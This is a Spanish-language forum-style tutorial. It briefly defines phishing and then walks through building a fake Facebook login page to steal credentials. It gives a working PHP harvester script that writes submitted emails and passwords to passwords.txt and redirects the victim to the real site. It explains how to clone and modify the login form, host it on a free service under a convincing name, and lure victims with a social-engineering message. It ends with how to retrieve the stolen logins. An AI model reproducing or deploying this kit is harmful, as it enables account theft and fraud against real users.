¿que es el phishing?

Suplantación de identidad. El termino Phishing es utilizado para referirse a uno de los métodos mas utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra

información bancaria de la victima. El estafador, conocido como phisher, se vale de técnicas de ingeniería social, haciéndose pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas. https://www.infospyware.com/articulos/q ... l-phishing toda la información de que es el phishing y como protegerse

¿como hackear facebook mediante phishing?

PASO 1: Crear archivo Phishing.php (block de notas ) 1. Incluso si usted no tiene ningún conocimiento de archivo PHP simplemente copia el siguiente script y lo guardara como phishing.php

?

1 2

3 4 5

6 7

8 9 10

:<?php header("Location: <!-- m --><a class="postlink" href="https://www.facebook.com/login.php" onclick="window.open(this.href);return false;" data-original-title=""

title="">https://www.facebook.com/login.php</a><!-- m -->"&#41;; $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");} fwrite($handle, "\r\n"); fclose($handle); exit; ?>

PASO 2 : Creación de página index.html :

1. Abra la página de inicio de sesión de Facebook a continuación , haga clic derecho > Ver

código fuente de página y pegarlo en el bloc de notas y guardarlo como

index.html

2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para:

acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con

phishing.php

[[

3. Búsqueda ( pulsa Ctrl + F ) para: método en ella y reemplace la parte resaltada (post ) con

get

4. pon guardar como index.html y hace click donde dice codificación UTF-8

OJO SI LO GUARDAS SIN LA CODIFICACIÓN UTF-8 QUEDARA LA PAGINA CON FALTA

DE AUTOGRAFIA Y CON SIGNOS DE PREGUNTA EN TODAS PARTES SI QUE POR ESO

GUARDARLO CON CODIFICACIÓN UTF-8

PASO 3 : Ahora crea un archivo de texto completamente en blanco con el nombre

passwords.txt

Ahora usted tiene todas las siguientes tres archivos con usted:

1. phishing.php

2. index.html

3. passwords.txt

Paso 4 : Ahora tiene que hacer un sitio web

Le recomendé que http://miarroba.es/ porque es completamente gratuito de alojamiento con

dominio gratis .

Ir a : http://miarroba.es/ y haga click en donde dice Regístrate y completa lo siguiente como la

captura de pantalla

2. Ahora vea su cuenta de correo electrónico que usted dio y confirme su cuenta con el enlace

de confirmación .

3. subir los archivos (index.html) (passwords.txt) (phishing.php) ya que esten adentro de su

cuenta miarroba van donde dice hosting si no lo encuentran entren

en http://hosting.miarroba.es luego van donde dice nuevo espacio dan click saldrá algo así

llenan los datos les recomiendo que en Dirección de la página web: pongan algo relacionado

con facebook como facebooksoporte o como quieran solo es para hacerlo un poco mas

creible

ahora si a subir los archivos (index.html) (passwords.txt) (phishing.php)

van donde dice 1 espacio alado de nuevo espacio dan click y saldrá el nombre que pusieron

en Título de la página web bueno le dan en administrar y saldrá algo muy parecido a esto van

donde dice webFTP

ay dos carpetas hacen click donde dice web abren la carpeta estará sin archivos

buno hacen click donde dice subir y marcan el archivo (index.html) ya que se aya subido el

index suben el archivo (passwords.txt) y luego el archivo (phishing.php) bueno quedaría algo

así

AHORA DAN CLICK DONDE DICE INDEX.HTML Y LOS LLEVARA A UNA PAGINA IGUAL A

FACEBOOK QUE PARECE LEGITIMA Y LISTO ENVÍAN EL LINK DICIENDO NOSE UN

EJEMPLO ME PUEDES AYUDAR CON MI PAGINA DALE ME GUSTA POR FAVOR

(ingeniería social)

la pagina falsa

AHORA CUANDO LA VICTIMA YA PUSO SU DATOS COMO CORREO ELECTRONICO

CONTRASEÑA YA QUE PUSO INICIAR RECIÉN SE VA ALA PAGINA ORINAL DE

FACEBOOK

¿ahora como reviso el correo y la clave que ingreso la victima?

muy fácil ay dos opciones de revisarlas

1. poniendo despues de el url passwords.txt como esta captura

2. abren miarroba van donde dice a su hosting creado van donde dice webFTP abren la

carpeta web marcan la casilla donde dice passwords.txt hacen click donde dice accion y hacen

click donde dice editar